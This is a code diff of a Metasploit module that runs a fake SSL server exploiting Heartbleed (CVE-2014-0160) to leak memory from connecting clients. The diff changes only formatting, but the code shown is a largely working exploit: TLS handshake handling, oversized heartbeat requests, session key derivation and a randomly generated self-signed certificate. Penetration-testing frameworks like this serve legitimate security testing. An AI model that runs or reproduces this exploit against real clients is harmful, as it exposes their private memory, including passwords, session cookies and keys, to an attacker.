@@ -9,53 +9,51 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',
-      'Description'    => %q{
+      'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',
+      'Description' => %q{
         This module provides a fake SSL service that is intended to
         leak memory from client systems as they connect. This module is
         hardcoded for using the AES-128-CBC-SHA1 cipher.
       },
-      'Author'         =>
-        [
-          'Neel Mehta', # Vulnerability discovery
-          'Riku', # Vulnerability discovery
-          'Antti', # Vulnerability discovery
-          'Matti', # Vulnerability discovery
-          'hdm' # Metasploit module
-        ],
-      'License'        => MSF_LICENSE,
-      'Actions'        => [['Capture', 'Description' => 'Run server to disclose memory from incoming clients']],
+      'Author' => [
+        'Neel Mehta', # Vulnerability discovery
+        'Riku', # Vulnerability discovery
+        'Antti', # Vulnerability discovery
+        'Matti', # Vulnerability discovery
+        'hdm' # Metasploit module
+      ],
+      'License' => MSF_LICENSE,
+      'Actions' => [['Capture', 'Description' => 'Run server to disclose memory from incoming clients']],
       'PassiveActions' => ['Capture'],
-      'DefaultAction'  => 'Capture',
-      'References'     =>
-        [
-          [ 'CVE', '2014-0160' ],
-          [ 'US-CERT-VU', '720951' ],
-          [ 'URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-098A' ],
-          [ 'URL', 'http://heartbleed.com/' ]
-        ],
+      'DefaultAction' => 'Capture',
+      'References' => [
+        [ 'CVE', '2014-0160' ],
+        [ 'US-CERT-VU', '720951' ],
+        [ 'URL', 'https://www.cisa.gov/uscert/ncas/alerts/TA14-098A' ],
+        [ 'URL', 'http://heartbleed.com/' ]
+      ],
       'DisclosureDate' => 'Apr 07 2014',
-      'Notes' =>
-          {
-              'AKA' => ['Heartbleed']
-          }
+      'Notes' => {
+        'AKA' => ['Heartbleed']
+      }
 
     )
 
     register_options(
       [
-        OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 8443 ]),
+        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8443 ]),
         OptInt.new('HEARTBEAT_LIMIT', [true, "The number of kilobytes of data to capture at most from each client", 512]),
         OptInt.new('HEARTBEAT_READ', [true, "The number of bytes to leak in the heartbeat response", 65535]),
         OptBool.new('NEGOTIATE_TLS', [true, "Set this to true to negotiate TLS and often leak more data at the cost of CA validation", false])
-      ])
+      ]
+    )
   end
 
   # Initialize the client state and RSA key for this session
   def setup
     super
-    @state    = {}
-    @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?
+    @state = {}
+    @cert_key = OpenSSL::PKey::RSA.new(1024) {} if negotiate_tls?
   end
 
   # Setup the server module and start handling requests
@@ -76,16 +74,16 @@ class MetasploitModule < Msf::Auxiliary
 
   # Determine whether we should negotiate TLS or not
   def negotiate_tls?
-    !! datastore['NEGOTIATE_TLS']
+    !!datastore['NEGOTIATE_TLS']
   end
 
   # Initialize a new state for every client
   def on_client_connect(c)
     @state[c] = {
-      :name          => "#{c.peerhost}:#{c.peerport}",
-      :ip            => c.peerhost,
-      :port          => c.peerport,
-      :heartbeats    => "",
+      :name => "#{c.peerhost}:#{c.peerport}",
+      :ip => c.peerhost,
+      :port => c.peerport,
+      :heartbeats => "",
       :server_random => [Time.now.to_i].pack("N") + Rex::Text.rand_text(28)
     }
     print_status("#{@state[c][:name]} Connected")
@@ -95,6 +93,7 @@ class MetasploitModule < Msf::Auxiliary
   def on_client_data(c)
     data = c.get_once
     return if not data
+
     @state[c][:buff] ||= ""
     @state[c][:buff] << data
     process_request(c)
@@ -102,9 +101,8 @@ class MetasploitModule < Msf::Auxiliary
 
   # Extract TLS messages from the buffer and process them
   def process_request(c)
-
     # Make this slightly harder to DoS
-    if @state[c][:buff].to_s.length > (1024*128)
+    if @state[c][:buff].to_s.length > (1024 * 128)
       print_status("#{@state[c][:name]} Buffer limit reached, dropping connection")
       c.close
       return
@@ -116,9 +114,9 @@ class MetasploitModule < Msf::Auxiliary
 
       message_type, message_ver, message_len = @state[c][:buff].unpack("Cnn")
       break unless message_len
-      break unless @state[c][:buff].length >= message_len+5
+      break unless @state[c][:buff].length >= message_len + 5
 
-      mesg = @state[c][:buff].slice!(0, message_len+5)
+      mesg = @state[c][:buff].slice!(0, message_len + 5)
 
       if @state[c][:encrypted]
         process_openssl_encrypted_request(c, mesg)
@@ -133,7 +131,7 @@ class MetasploitModule < Msf::Auxiliary
     message_type, message_version, protocol_version = data.unpack("Cn@9n")
 
     if message_type == 0x15 and data.length >= 7
-      message_level, message_reason = data[5,2].unpack("CC")
+      message_level, message_reason = data[5, 2].unpack("CC")
       print_status("#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}")
       if message_level == 2 and message_reason == 0x30
         print_status("#{@state[c][:name]} Client rejected our certificate due to unknown CA")
@@ -148,7 +146,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     unless message_type == 0x18
-      message_code = data[5,1].to_s.unpack("C").first
+      message_code = data[5, 1].to_s.unpack("C").first
       vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
     end
 
@@ -163,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
       print_status("#{@state[c][:name]} Processing Client Hello...")
 
       # Extract the client_random needed to compute the master key
-      @state[c][:client_random]  = data[11,32]
+      @state[c][:client_random] = data[11, 32]
       @state[c][:received_hello] = true
 
       print_status("#{@state[c][:name]} Sending Server Hello...")
@@ -203,8 +201,8 @@ class MetasploitModule < Msf::Auxiliary
 
       # Process cleartext heartbeat replies
       if message_type == 0x18
-        vprint_status("#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]")
-        @state[c][:heartbeats] << data[5, data.length-5]
+        vprint_status("#{@state[c][:name]} Heartbeat received (#{data.length - 5} bytes) [#{@state[c][:heartbeats].length} bytes total]")
+        @state[c][:heartbeats] << data[5, data.length - 5]
       end
 
       # Full up on heartbeats, disconnect the client
@@ -223,14 +221,14 @@ class MetasploitModule < Msf::Auxiliary
     return if @state[c][:shutdown]
     return unless data.length > 5
 
-    buff = decrypt_data(c, data[5, data.length-5])
+    buff = decrypt_data(c, data[5, data.length - 5])
     unless buff
       print_error("#{@state[c][:name]} Failed to decrypt, giving up on this client")
       c.close
       return
     end
 
-    message_code = buff[0,1].to_s.unpack("C").first
+    message_code = buff[0, 1].to_s.unpack("C").first
     vprint_status("#{@state[c][:name]} Message #{sprintf("type %.2x v%.4x %.2x", message_type, message_version, message_code)}")
 
     if message_type == 0x16
@@ -301,7 +299,6 @@ class MetasploitModule < Msf::Auxiliary
 
   # Send an OpenSSL Server Hello response
   def openssl_send_server_hello(c, hello, version)
-
     # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the
     # first cipher suite sent by the client.
     if @state[c][:encrypted]
@@ -322,7 +319,7 @@ class MetasploitModule < Msf::Auxiliary
       "\x00" +                     # Compression Method (none)
       [extensions.length].pack('n') + extensions
 
-    server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload
+    server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1, 3] + server_hello_payload
 
     msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello
     c.put(msg1)
@@ -360,38 +357,38 @@ class MetasploitModule < Msf::Auxiliary
 
   # Generate a self-signed certificate to use for the service
   def generate_certificate
-    key  = @cert_key
+    key = @cert_key
     cert = OpenSSL::X509::Certificate.new
     cert.version = 2
-    cert.serial  = rand(0xFFFFFFFF)
+    cert.serial = rand(0xFFFFFFFF)
 
     subject_cn = Rex::Text.rand_hostname
     subject = OpenSSL::X509::Name.new([
-        ["C","US"],
-        ['ST', Rex::Text.rand_state()],
-        ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
-        ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
-        ["CN", subject_cn],
-      ])
+      ["C", "US"],
+      ['ST', Rex::Text.rand_state()],
+      ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
+      ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
+      ["CN", subject_cn],
+    ])
     issuer = OpenSSL::X509::Name.new([
-        ["C","US"],
-        ['ST', Rex::Text.rand_state()],
-        ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
-        ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
-        ["CN", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
-      ])
+      ["C", "US"],
+      ['ST', Rex::Text.rand_state()],
+      ["L", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
+      ["O", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
+      ["CN", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],
+    ])
 
     cert.subject = subject
     cert.issuer = issuer
     cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)
     cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)
     cert.public_key = key.public_key
-    ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
+    ef = OpenSSL::X509::ExtensionFactory.new(nil, cert)
     cert.extensions = [
-      ef.create_extension("basicConstraints","CA:FALSE"),
-      ef.create_extension("subjectKeyIdentifier","hash"),
-      ef.create_extension("extendedKeyUsage","serverAuth"),
-      ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
+      ef.create_extension("basicConstraints", "CA:FALSE"),
+      ef.create_extension("subjectKeyIdentifier", "hash"),
+      ef.create_extension("extendedKeyUsage", "serverAuth"),
+      ef.create_extension("keyUsage", "keyEncipherment,dataEncipherment,digitalSignature")
     ]
     ef.issuer_certificate = cert
     cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
@@ -411,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary
 
       # Trim the trailing MAC signature off the buffer
       if buff.length >= 20
-        return buff[0, buff.length-20]
+        return buff[0, buff.length - 20]
       end
     rescue ::OpenSSL::Cipher::CipherError => e
       print_error("#{@state[c][:name]} Decryption failed: #{e}")
@@ -433,7 +430,7 @@ class MetasploitModule < Msf::Auxiliary
 
     key_block = tls1_prf(
       @state[c][:master],
-      "key expansion" +  @state[c][:server_random] + @state[c][:client_random],
+      "key expansion" + @state[c][:server_random] + @state[c][:client_random],
       (20 * 2) + (16 * 4)
     )
 
@@ -441,22 +438,22 @@ class MetasploitModule < Msf::Auxiliary
     @state[c].update({
       :client_write_mac_key => key_block.slice!(0, 20),
       :server_write_mac_key => key_block.slice!(0, 20),
-      :client_write_key     => key_block.slice!(0, 16),
-      :server_write_key     => key_block.slice!(0, 16),
-      :client_iv            => key_block.slice!(0, 16),
-      :server_iv            => key_block.slice!(0, 16),
+      :client_write_key => key_block.slice!(0, 16),
+      :server_write_key => key_block.slice!(0, 16),
+      :client_iv => key_block.slice!(0, 16),
+      :server_iv => key_block.slice!(0, 16),
     })
 
     client_cipher = OpenSSL::Cipher.new('aes-128-cbc')
     client_cipher.decrypt
     client_cipher.key = @state[c][:client_write_key]
-    client_cipher.iv  = @state[c][:client_iv]
+    client_cipher.iv = @state[c][:client_iv]
     client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))
 
     server_cipher = OpenSSL::Cipher.new('aes-128-cbc')
     server_cipher.encrypt
     server_cipher.key = @state[c][:server_write_key]
-    server_cipher.iv  = @state[c][:server_iv]
+    server_cipher.iv = @state[c][:server_iv]
     server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))
 
     @state[c].update({
@@ -472,10 +469,11 @@ class MetasploitModule < Msf::Auxiliary
   # Determine the master key from the premaster and client/server randoms
   def tls1_calculate_master_key(c)
     return unless (
-      @state[c][:premaster]     and
+      @state[c][:premaster] and
       @state[c][:client_random] and
       @state[c][:server_random]
     )
+
     tls1_prf(
       @state[c][:premaster],
       "master secret" + @state[c][:client_random] + @state[c][:server_random],
@@ -503,14 +501,14 @@ class MetasploitModule < Msf::Auxiliary
     out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack("C*")
 
     # XOR the results together
-    [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack("C*")
+    [*(0..out1.length - 1)].map { |i| out1[i] ^ out2[i] }.pack("C*")
   end
 
   # Used by tls1_prf to generate arbitrary amounts of session key data
   def tls1_p_hash(digest, secret, label, olen)
-    output  = ""
-    chunk   = OpenSSL::Digest.new(digest).digest_length
-    ctx     = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
+    output = ""
+    chunk = OpenSSL::Digest.new(digest).digest_length
+    ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
     ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))
 
     ctx.update(label)
